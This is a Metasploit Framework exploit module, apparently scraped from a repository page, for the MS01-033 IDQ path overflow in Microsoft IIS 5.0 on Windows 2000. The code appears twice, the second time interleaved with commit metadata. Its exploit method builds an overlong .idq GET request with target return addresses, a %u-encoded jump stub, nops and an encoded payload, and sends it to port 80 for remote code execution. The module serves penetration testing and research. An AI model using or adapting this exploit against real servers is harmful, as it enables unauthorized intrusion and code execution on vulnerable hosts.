metasploit-framework/modules/exploits/windows/iis/ms01_033_idq.rb

require 'msf/core'

module Msf

class Exploits::Windows::Iis::MS01_033_IDQ < Msf::Exploit::Remote

	include Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Microsoft IIS 5.0 IDQ Path Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in the IDQ ISAPI handler for
				Microsoft Index Server.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 3783 $',
			'References'     =>
				[
					[ 'CVE', '2001-0500'],
					[ 'MSB', 'MS01-033'],
					[ 'BID', '2880'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},

			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 800,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
					'StackAdjustment' => -3500,
				},
				
			'Platform'       => 'win',
			'Targets'        => 
				[
					[ 'Windows 2000 English SP0',     { 'Ret' => '0x6e8f3e24' } ],
					[ 'Windows 2000 English SP1-SP2', { 'Ret' => '0x6e8f8cc4' } ],
				],
			'DisclosureDate' => 'Jun 18 2001',
			'DefaultTarget' => 0))
			
		register_options(
			[
				Opt::RPORT(80)
			], self.class)			
	end

#
# Uncomment this once false positives have been fixed
#
=begin
	def check
		connect
		
		sock.put("GET /#{Rex::Text.text_rand_alphanumeric(2)}.idq HTTP/1.0\r\n\r\n")
		resp = sock.get_once
		disconnect
		
		if (resp =~ /200 OK/)
			return Exploit::CheckCode::Vulnerable
		end
		
		return Exploit::CheckCode::Safe
	end
=end

	def exploit
		connect

		sploit =  Rex::Text.rand_text_alphanumeric(1) + ".idq?" + Rex::Text.rand_text_alphanumeric(232, payload_badchars)
		sploit << "%u06eb.%u" + target.ret[-4, 4] + "%u" + target.ret[-8, 4] 
		sploit << ".%uC033%uB866%u031F%u0340%u8BD8%u8B03%u6840%uDB33%u30B3%uC303%uE0FF=" + Rex::Text.rand_text_alphanumeric(1)
		sploit << " HTTP/1.0\r\n" + make_nops(10) + Rex::Text.rand_text_alphanumeric(36, payload_badchars)

		uri = '/' + sploit + payload.encoded 

		res = "GET #{uri}\r\n\r\n"

		print_status("Trying target #{target.name}...")

		sock.put(res)
		
		handler
		disconnect
	end

end
end
More modules from MC git-svn-id: file:///home/svn/framework3/trunk@3874 4d416f70-5f16-0410-b530-b9f4589650da 2006-09-13 06:20:05 +00:00			`require 'msf/core'`

			`module Msf`

			`class Exploits::Windows::Iis::MS01_033_IDQ < Msf::Exploit::Remote`

			`include Exploit::Remote::Tcp`

			`def initialize(info = {})`
			`super(update_info(info,`
Consistency fixes for IIS modules git-svn-id: file:///home/svn/framework3/trunk@3875 4d416f70-5f16-0410-b530-b9f4589650da 2006-09-13 06:25:40 +00:00			`'Name' => 'Microsoft IIS 5.0 IDQ Path Overflow',`
More modules from MC git-svn-id: file:///home/svn/framework3/trunk@3874 4d416f70-5f16-0410-b530-b9f4589650da 2006-09-13 06:20:05 +00:00			`'Description' => %q{`
			`This module exploits a stack overflow in the IDQ ISAPI handler for`
			`Microsoft Index Server.`
			`},`
			`'Author' => [ 'MC' ],`
			`'License' => MSF_LICENSE,`
			`'Version' => '$Revision: 3783 $',`
			`'References' =>`
			`[`
			`[ 'CVE', '2001-0500'],`
			`[ 'MSB', 'MS01-033'],`
			`[ 'BID', '2880'],`
			`],`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'thread',`
			`},`

			`'Privileged' => false,`
			`'Payload' =>`
			`{`
			`'Space' => 800,`
			`'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",`
			`'StackAdjustment' => -3500,`
			`},`

			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`[ 'Windows 2000 English SP0', { 'Ret' => '0x6e8f3e24' } ],`
			`[ 'Windows 2000 English SP1-SP2', { 'Ret' => '0x6e8f8cc4' } ],`
			`],`
			`'DisclosureDate' => 'Jun 18 2001',`
			`'DefaultTarget' => 0))`

			`register_options(`
			`[`
			`Opt::RPORT(80)`
			`], self.class)`
			`end`

			`#`
			`# Uncomment this once false positives have been fixed`
			`#`
			`=begin`
			`def check`
			`connect`

			`sock.put("GET /#{Rex::Text.text_rand_alphanumeric(2)}.idq HTTP/1.0\r\n\r\n")`
			`resp = sock.get_once`
			`disconnect`

			`if (resp =~ /200 OK/)`
			`return Exploit::CheckCode::Vulnerable`
			`end`

			`return Exploit::CheckCode::Safe`
			`end`
			`=end`

			`def exploit`
			`connect`

			`sploit = Rex::Text.rand_text_alphanumeric(1) + ".idq?" + Rex::Text.rand_text_alphanumeric(232, payload_badchars)`
			`sploit << "%u06eb.%u" + target.ret[-4, 4] + "%u" + target.ret[-8, 4]`
			`sploit << ".%uC033%uB866%u031F%u0340%u8BD8%u8B03%u6840%uDB33%u30B3%uC303%uE0FF=" + Rex::Text.rand_text_alphanumeric(1)`
			`sploit << " HTTP/1.0\r\n" + make_nops(10) + Rex::Text.rand_text_alphanumeric(36, payload_badchars)`

			`uri = '/' + sploit + payload.encoded`

			`res = "GET #{uri}\r\n\r\n"`

			`print_status("Trying target #{target.name}...")`

			`sock.put(res)`

			`handler`
			`disconnect`
			`end`

			`end`
			`end`